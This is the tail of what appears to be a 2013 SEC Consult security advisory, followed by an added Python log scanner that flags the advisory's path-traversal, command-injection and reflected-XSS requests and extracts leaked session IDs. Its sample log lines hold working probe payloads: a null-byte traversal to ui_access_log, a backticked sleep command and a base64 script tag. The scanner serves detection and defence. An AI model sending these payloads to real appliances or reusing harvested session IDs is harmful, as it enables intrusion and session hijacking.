Consult Unternehmensberatung GmbH\n\nOffice Vienna\nMooslackengasse 17\nA-1190 Vienna\nAustria\n\nTel.: +43 / 1 / 890 30 43 - 0\nFax.: +43 / 1 / 890 30 43 - 25\nMail: research at sec-consult dot com\nhttps://www.sec-consult.com\nhttp://blog.sec-consult.com\n\n\nEOF Wolfgang Ettlinger, Stefan Viehb\u00f6ck / @2013", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
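As an added example for sections 1) to 3) of the advisory above (not code from the SEC Consult advisory or from the Metasploit module): a small Python scanner that, on the defensive side, pulls the STYLE session IDs out of a leaked ui_access_log excerpt (what an attacker harvests via the traversal) and flags the three request shapes the advisory quotes, i.e. the patience.cgi traversal with a trailing null byte, backtick-enclosed commands in PHP UI parameters, and reflected script tags (including the base64-encoded msg parameter of errdoc.php). The sample log lines are constructed to mirror the advisory's formats; the fixed 32-hex-character session-ID format and a Combined-format access log are assumptions.

```python
"""Indicators for the three issue classes in the advisory above.

Added example for this page; not part of the SEC Consult advisory or of the
Metasploit module. Sample log lines and request bodies are constructed to
mirror the formats the advisory quotes. Assumptions: session IDs are always
32 lowercase hex characters (as in the quoted excerpt) and the web server
writes a Combined-format access log.
"""
from __future__ import annotations

import base64
import re
from urllib.parse import parse_qs, urlsplit

# Section 1: the UI carries the PHP session ID in the STYLE URL parameter, so a
# leaked ui_access_log (request line or Referer) yields live admin sessions.
_STYLE_RE = re.compile(r"[?&]STYLE=([0-9a-f]{32})\b")

# Method and request-target inside the quoted request of an access-log line.
_REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Opening or closing script tag, as in the four reflected-XSS URLs of section 3.
_SCRIPT_RE = re.compile(r"<\s*/?\s*script\b", re.I)


def extract_session_ids(ui_access_log: str) -> set[str]:
    """Session IDs an attacker harvests from a leaked ui_access_log (section 1)."""
    return set(_STYLE_RE.findall(ui_access_log))


def _params(target: str, body: str) -> dict[str, list[str]]:
    """Decoded query-string and form-body parameters merged into one dict."""
    merged = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for key, values in parse_qs(body, keep_blank_values=True).items():
        merged.setdefault(key, []).extend(values)
    return merged


def classify_request(method: str, target: str, body: str = "") -> list[str]:
    """Indicator names that fire for one request (query string plus POST body).

    An access log shows only the query string, so the POST-body injections of
    section 2 (diagnostic_tools, local_site_list_editor) are visible only to a
    reverse proxy, a WAF or the application itself; pass the body when you have it.
    """
    path = urlsplit(target).path.lower()
    params = _params(target, body if method.upper() == "POST" else "")
    values = [v for vs in params.values() for v in vs]
    hits = []

    # Section 1: patience.cgi?id=../../<file>%00 (parse_qs has already decoded %00 to NUL)
    if path.endswith("/cgi-bin/patience.cgi") and any(
        "../" in v or "..\\" in v or "\x00" in v for v in params.get("id", [])
    ):
        hits.append("patience_traversal")

    # Section 2: a backtick-enclosed command in any parameter of the PHP UI
    if path.endswith(".php") and any("`" in v for v in values):
        hits.append("command_injection")

    # Section 3: a script tag in a reflected parameter; errdoc.php takes msg base64-encoded
    reflected = list(values)
    for encoded in params.get("msg", []):
        try:
            reflected.append(base64.b64decode(encoded, validate=True).decode("latin-1"))
        except ValueError:  # not base64, keep the raw value only
            pass
    if path.endswith(".php") and any(_SCRIPT_RE.search(v) for v in reflected):
        hits.append("reflected_xss")
    return hits


def scan_access_log(log_text: str) -> list[tuple[int, list[str]]]:
    """(line number, indicators) for every access-log line that fires at least one."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        match = _REQ_RE.search(line)
        if match:
            hits = classify_request(match["method"], match["target"])
            if hits:
                findings.append((line_no, hits))
    return findings


# The excerpt quoted in section 1, in the form the traversal returns it.
SAMPLE_UI_ACCESS_LOG = (
    '<host> - - [21/Feb/2013:17:02:17 +0000] "POST /index.php?c=dashboard HTTP/1.1" 200 139 '
    '"https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153" '
    '"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"\n'
)

# Constructed web-server access log (not from the advisory): three probes and one benign hit.
SAMPLE_ACCESS_LOG = (
    '198.51.100.7 - - [03/Apr/2013:10:00:01 +0000] "GET /cgi-bin/patience.cgi?id=../../log/ui_access_log%00 HTTP/1.1" 200 4096 "-" "curl/7.29.0"\n'
    '198.51.100.7 - - [03/Apr/2013:10:00:02 +0000] "GET /end-user/index.php?reason=application&client-ip=%20%60sleep+10%60 HTTP/1.1" 200 512 "-" "curl/7.29.0"\n'
    '198.51.100.7 - - [03/Apr/2013:10:00:03 +0000] "GET /end-user/errdoc.php?e=530&msg=PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ%2bCg%3d%3d HTTP/1.1" 200 1024 "-" "Mozilla/5.0"\n'
    '192.0.2.9 - - [03/Apr/2013:10:00:04 +0000] "GET /index.php?c=dashboard HTTP/1.1" 200 139 "-" "Mozilla/5.0"\n'
)

if __name__ == "__main__":
    print("session IDs exposed by the leaked log:", sorted(extract_session_ids(SAMPLE_UI_ACCESS_LOG)))
    for line_no, hits in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"access log line {line_no}: {', '.join(hits)}")
```

Two practitioner caveats follow from the code: only the GET-based issues (the traversal, the client-ip injection on the block page, the reflected XSS) can be found in an access log, because the diagnostic_tools and local_site_list_editor injections travel in POST bodies; and any STYLE value found in a ui_access_log that has been requested through patience.cgi should be treated as a leaked credential, so sessions should be invalidated when the appliance is updated to 3.7.8.2.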
